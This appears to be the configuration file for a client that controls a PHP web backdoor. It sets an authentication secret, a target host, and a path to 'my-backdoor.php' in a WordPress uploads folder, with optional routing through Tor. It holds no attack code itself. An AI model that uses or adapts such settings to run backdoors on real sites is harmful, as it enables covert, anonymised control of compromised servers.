[auth]

# Secret phrase for generation valid hash (required parameter)
secret = FunTriumphsOverUgly

[miniprog]

# Host name (and port) of www-site with miniprog-processor php-file (optional parameter)
#host = ugly-blog.example.org

# Path to miniprog-processor php-file (optional parameter)
#path = /wp-content/uploads/2011/12/my-backdoor.php

# Connect via Tor Project network (optional parameter). Default is false
#tor = false

[debug]

# Path to local-file for outputting last mini-program (optional parameter)
#last-miniprog = /home/my-user-name/last-miniprog.txt
